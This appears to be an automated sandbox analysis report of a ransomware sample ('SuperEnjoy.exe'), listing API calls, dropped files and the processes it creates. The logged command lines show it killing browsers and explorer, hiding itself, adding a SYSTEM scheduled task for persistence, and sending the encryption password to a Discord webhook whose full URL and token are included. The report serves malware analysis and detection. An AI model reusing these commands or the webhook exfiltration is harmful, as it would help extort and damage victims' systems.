Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_00374A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00374A35
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003F55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_003F55FD
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A44A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,18_2_00A44A35
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AC55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,18_2_00AC55FD
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003933C7 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_003933C7
Source: C:\Windows\System32\cmd.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\SuperEnjoy.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\SuperEnjoy.exeWindow / User API: threadDelayed 7715Jump to behavior
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 422Jump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeWindow / User API: threadDelayed 6745
Source: C:\Users\user\Desktop\SuperEnjoy.exeDropped PE file which has not been started: C:\Windows\Temp\1810.tmp\aescrypt.exeJump to dropped file
Source: C:\Users\user\Desktop\SuperEnjoy.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\EEFC.tmp\aescrypt.exeJump to dropped file
Source: C:\Users\user\Desktop\SuperEnjoy.exe TID: 3236Thread sleep count: 7715 > 30Jump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exe TID: 3236Thread sleep time: -192875s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exe TID: 4768Thread sleep count: 422 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe TID: 5928Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe TID: 6244Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exe TID: 6220Thread sleep count: 6745 > 30
Source: C:\Users\user\Desktop\SuperEnjoy.exe TID: 6220Thread sleep time: -168625s >= -30000s
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exe TID: 6412Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exe TID: 6408Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\SuperEnjoy.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\SuperEnjoy.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\SuperEnjoy.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\SuperEnjoy.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\SuperEnjoy.exeThread sleep count: Count: 7715 delay: -25Jump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeThread sleep count: Count: 6745 delay: -25
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003D4696 GetFileAttributesW,FindFirstFileW,FindClose,5_2_003D4696
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DC93C FindFirstFileW,FindClose,5_2_003DC93C
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,5_2_003DC9C7
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_003DF200
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,5_2_003DF35D
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_003DF65E
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003D3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_003D3A2B
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003D3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,5_2_003D3D4E
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003DBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,5_2_003DBF27
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AA4696 GetFileAttributesW,FindFirstFileW,FindClose,18_2_00AA4696
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AAC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,18_2_00AAC9C7
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AAC93C FindFirstFileW,FindClose,18_2_00AAC93C
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AAF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_00AAF200
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AAF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,18_2_00AAF35D
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AAF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_00AAF65E
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AA3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00AA3A2B
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AA3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,18_2_00AA3D4E
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00AABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,18_2_00AABF27
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_00374AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,5_2_00374AFE
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile opened: C:\Users\user\AppData\Local\Temp\EEFC.tmpJump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile opened: C:\Users\user\AppData\Local\Temp\EEFC.tmp\EEFD.tmp\EEFE.tmpJump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Users\user\Desktop\SuperEnjoy.exeFile opened: C:\Users\user\AppData\Local\Temp\EEFC.tmp\EEFD.tmpJump to behavior
Source: DiscordSendWebhook.exe, 00000012.00000002.243241458.0000000001739000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW-
Source: DiscordSendWebhook.exe, 00000005.00000003.212194208.000000000120B000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 0000000D.00000003.227744228.0000000001886000.00000004.00000001.sdmp, DiscordSendWebhook.exe, 00000012.00000002.243241458.0000000001739000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: DiscordSendWebhook.exe, 0000000D.00000003.227744228.0000000001886000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWen-USn
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003E41FD BlockInput,5_2_003E41FD
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_00373B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00373B4C
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003A5CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_003A5CCC
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_0040A6F6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,1_2_0040A6F6
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003C81F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,5_2_003C81F7
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,1_2_004098D0
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 1_2_004098F0 SetUnhandledExceptionFilter,1_2_004098F0
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_0039A364 SetUnhandledExceptionFilter,5_2_0039A364
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_0039A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0039A395
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 14_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,14_2_004098D0
Source: C:\Users\user\Desktop\SuperEnjoy.exeCode function: 14_2_004098F0 SetUnhandledExceptionFilter,14_2_004098F0
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A6A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00A6A395
Source: C:\Windows\Temp\1810.tmp\DiscordSendWebhook.exeCode function: 18_2_00A6A364 SetUnhandledExceptionFilter,18_2_00A6A364
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003C8C93 LogonUserW,5_2_003C8C93
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_00373B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,5_2_00373B4C
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_00374A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00374A35
Source: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exeCode function: 5_2_003D4EF5 mouse_event,5_2_003D4EF5
Source: C:\Users\user\Desktop\SuperEnjoy.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\EEFD.tmp\EEFE.bat C:\Users\user\Desktop\SuperEnjoy.exe'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib C:\Users\user\Desktop\SuperEnjoy.exe +r +s +hJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4KJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im iexplore.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\user\cryptormsg.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im explorer.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc onlogon /tn UpdateWuauclt /rl highest /tr 'C:\Users\user\Desktop\SuperEnjoy.exe' /RU 'SYSTEM'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\EEFC.tmp\DiscordSendWebhook' -m ':satellite: New Crypt from user, Password: nlhgQrx0YClnVSjR, FakeAccount: 5IpSW2U5mEVIu5q473DwAEJb0PR8B2Z' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4KJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir * /a-D /s /b | findstr /I /V /C:'^$'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im firefox.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im opera.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
